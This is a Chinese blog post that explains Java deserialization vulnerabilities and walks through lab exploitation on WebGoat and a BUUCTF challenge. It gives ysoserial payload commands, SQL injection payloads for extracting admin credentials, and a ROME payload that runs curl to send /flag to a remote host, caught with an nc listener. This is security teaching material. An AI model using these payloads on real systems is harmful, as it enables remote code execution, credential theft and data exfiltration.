Java反序列化漏洞实战:原理剖析与复现步骤

于 2024-08-06 00:00:00 发布
阅读量776 收藏 23
点赞数 9
分类专栏: 网络空间安全 文章标签: java 开发语言 web安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140929801
版权

文章目录


在现代应用程序开发中,Java反序列化漏洞已成为一个备受关注的安全问题。反序列化是Java中用于将字节流转换回对象的过程,但如果没有妥善处理,攻击者可以通过精心构造的恶意数据,利用反序列化漏洞执行任意代码,进而控制整个系统。理解Java反序列化漏洞的工作原理,并掌握其复现技巧,对于提升我们的安全防护水平至关重要。

本文将深入剖析Java反序列化漏洞的原理,展示如何在实际环境中复现该漏洞,并提供有效的防御措施。无论你是网络安全的新手,还是经验丰富的开发者,都能从中获得宝贵的知识和实用的技能。让我们一同揭开Java反序列化漏洞的神秘面纱,提升我们的安全防护能力

java反序列化

  1. 概念

    1. Java 反序列化是一种将字节流转换回相应的 Java 对象的过程。反序列化与序列化相对应,序列化是将对象转换为字节流的过程。反序列化在分布式系统、持久化存储、网络通信和深度复制等应用中非常重要。

  2. 数据

    1. 功能特性

      1. 反序列化操作一般应用在导入模板文件、网络通信、数据传输、日志格式化存储、对象数据落磁盘、或DB存储等业务场景。因此审计过程中重点关注这些功能板块。

    2. 数据特性

      1. 如果一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
      2. 如果以aced开头,那么他就是这一段java序列化的16进制。

    3. 出现具体

      1. http参数,cookie,sesion,存储方式可能是base64(rO0),压缩后的base64(H4s),MII等 Servlets http,Sockets,Session管理器,包含的协议就包括:JMX,RMI,JMS,JND1等 (xacXed)xml Xstream, XmldEcoder等(http Body: Content-type: application/xml) json(jackson,fastjson)http请求中包含

  3. 示例

    1. 序列化与反序列化操作–代码

      package SerialTest;

import java.io.*;

public class SerializableTest {
    public static void main(String[] args) throws Exception {
        serialPerson();
        Person person = deserialPerson();
        System.out.println(person);
    }

    /**
     * Person对象序列化
     * @throws IOException
     */
    private static void serialPerson() throws IOException {
        Person person = new Person("xiaodi", 28, "男", 101);

        ObjectOutputStream oos = new ObjectOutputStream(
                new FileOutputStream(new File("d:/1/person.txt"))
        );
        oos.writeObject(person);
        System.out.println("person 对象序列化成功!");
        oos.close();
    }

    /**
     * Person对象反序列化
     * @return
     * @throws Exception
     */
    private static Person deserialPerson() throws Exception {
        ObjectInputStream ois = new ObjectInputStream(
                new FileInputStream(new File("d:/1/x.txt"))
        );
        Person person = (Person)ois.readObject();
        System.out.println("person 对象反序列化成功!");
        //Runtime.getRuntime().exec("calc.exe");
        return person;
    }
}

  4. Ysoserial工具使用

    1. 概念
      1. 用于生成原生态或者是第三方组件的序列化数据
    2. 原生态api

      1. dns利用序列化数据生成

        java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://hnsmhz.dnslog.cn" > b.txt

      2. 将其进行反序列化成功ping通dns

    3. 第三方组件
      1. 概念
      2. 复现

        1. 靶场:webgoat

        2. 环境启动

          java -jar webgoat-server-8.1.0.jar --server.port=8000
//注意,java的版本为11
//登录地址:http://localhost:8000/WebGoat   注意大小写

        3. 通过代码审计,发现符合Hibernate1 序列化库特征,可以直接使用现有的库来构造弹出计算机的payload,也可以直接用网站的库来构造payload

          1. payload

            java -cp "hibernate-core-5.4.9.Final.jar;ysoserial-0.0.6-SNAPSHOT-all.jar" ysoserial.GeneratePayload Hibernate1 "calc.exe" > x.bin

        4. 生成bin文件

        5. 因为网站用的是base64加密,故用base64加密脚本进行加密

          1. 解密脚本

            import base64
file = open("flag.bin","rb")

now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

  5. 反序列化示例

  6. 靶场
    1. buuctf搜索2020 朱雀组 think java
    2. 源码下载:class.zip
  7. 过程

    1. 打开源码,发现sql注入

    2. 对其进行注入,获得admin的账号和密码

      1. payload

        url:http://fc2c9ce6-f7ce-43cd-88e8-4575718ab6b9.node5.buuoj.cn:81/common/test/sqlDict
dbName=myapp?a='union select (select name from user)#
dbName=myapp?a='union select (select pwdfrom user)#

    3. 通过扫描可以得到有swagger未授权漏洞,打开http://fc2c9ce6-f7ce-43cd-88e8-4575718ab6b9.node5.buuoj.cn:81/swagger-ni.html页面

    4. 在接口文档中输入账号和密码,登录成功,查看返回的数据,发现rO0AB开头,疑似base64加密后的java序列化数据

    5. 发现此页面存在对token的验证文档,可能需要进行反序列化操作

    6. 通过生成ping域名的payload并对其进行base64加密测试,发现存在此类漏洞

      1. payload:

        java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://ag61d5.dnslog.cn" > b.txt

    7. 通过nc将读取flag值并反弹到服务器

      1. payload

        服务端:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://xx.xx.xx.xx:4444/ -d @/flag" > b.txt
攻击者启动监听:
nc -lvp 4444

通过本文的学习,我们不仅深入了解了Java反序列化漏洞的原理,还掌握了复现该漏洞的具体步骤和有效的防御策略。安全防护不仅是技术上的突破,更是一种持续关注和防范的意识。通过对Java反序列化漏洞的全面剖析,我们能够更好地识别和修复潜在的安全风险,从而保护我们的系统和数据免受攻击。

在信息安全的道路上,我们每个人都有责任和义务不断提升自身的安全技能和意识。希望本文能为你在安全防护方面提供有价值的指导和帮助,激发你对网络安全的持续关注和兴趣。让我们共同努力,构建一个更为安全和可靠的网络环境。如果你有任何疑问或宝贵的建议,欢迎在评论区与我们互动。感谢你的阅读,期待你的反馈与分享!

CongSec
关注
  • 9
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java-rmi-registry反序列化漏洞复现
0xSec
12-25 1632
java.rmi.registry是java语言的一个包
复现java反序列化漏洞的方法
weixin_47623655的博客
03-30 1600
在本文中,我们学习了如何使用ysoserial来生成恶意payload,以及如何利用Python的SimpleHTTPServer模块来搭建一个HTTP服务器来接收Tomcat发送的数据包。当反序列化一个包含恶意代码的序列化数据时,攻击者可以利用该漏洞在目标系统上执行任意代码,导致系统崩溃或数据泄露。通过上面的步骤,我们可以成功地复现Java反序列化漏洞,并在使用ysoserial生成恶意payload之后,我们需要将其发送到目标服务器进行验证漏洞是否存在。接下来,我们需要构造一个包含这个类的序列化数据。
Java反序列化漏洞利用及修复 示例代码
白帽子凯哥哥的博客
01-03 680
Java反序列化漏洞发生在当应用程序或服务反序列化了恶意构造的或篡改的数据时。Java序列化是一个将对象转换为字节流的过程,以便可以将其写入磁盘、数据库或通过网络传输。反序列化则是将这些字节流重新构造成原始对象的过程。
Java反序列化漏洞详解(易懂)
最新发布
weixin_63350467的博客
07-15 1151
这篇文章主要还是让大家简单理解为啥会出现这个漏洞,以及查找漏洞的流程。对于java的序列化,反射,类加载等知识点的详细内容,大家可以自己感兴趣找找。这里主要还是让和我一样的小白简单理解一下这个漏洞原理
安全反序列化(php&java)及漏洞复现
weixin_58954236的博客
09-06 1503
class Stu{在unserialize文件夹下新建一个stu.class.php文件,将上述代码复制进去。class(关键字:类),stu是类名。
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 234
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
Java反序列化高危漏洞重现
qq_45498778的博客
11-27 341
Java反序列化漏洞存在着极大危害,今天我来为大家重现一下。
Java 反序列化漏洞原理
Venscor技术养成之路
10-27 2482
最近做白盒审计,涉及到了java反序列化代码执行漏洞。由于接触web较晚,所以之前并未研究过此漏洞,这次出于工作需要,特意花了一点时间研究下。一、漏洞怎么生产的如果一个应用接受反序列化数据,并且没有对反序列化的对象做限制,就可能导致代码执行。(使用了有安全缺陷的Apache Commons Collections jar包) public static void main(String[] a
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
Java反序列化漏洞中存在利用链, 攻击者通常将其与任意命令漏洞结合控制服务器。人工检测反序列化链需要花费大量的精力, 需要依赖代码审计人员的专业知识。 文章基于污点分析提出 种静态检测和动态验证的方法, ...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java 反序列化漏洞
qq_61553520的博客
05-24 5007
在各种编程语言反序列化漏洞中,Java是最引人瞩目的,因为Java开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
java struts2 漏洞复现合集
whatday的专栏
08-31 4729
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 657
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
API安全产品,面试官都被搞懵了
2401_83974173的博客
04-13 599
这些策略通常会结合使用,以提高产品在市场中的知名度和竞争力。
Java反序列化漏洞分析
qq_51453285的博客
06-10 1084
Java反序列化漏洞Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。Java反序列化漏洞是由于Java序列化机制本身的缺陷导致的。为了防止恶意序列化数据被反序列化,可以在程序中对未知的序列化数据进行拒绝,或者对序列化数据进行白名单或黑名单的过滤。Java反序列化漏洞的攻击方式主要有两种:基于本地文件的反序列化攻击和基于网络反序列化攻击。
JAVA反序列化漏洞复现
weixin_56537388的博客
09-05 128
拉取容器访问​启动nacs进行漏洞扫描下载weblogicScanner工具开始扫描访问bp抓包,漏洞利用代码主机监听获得反弹shell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值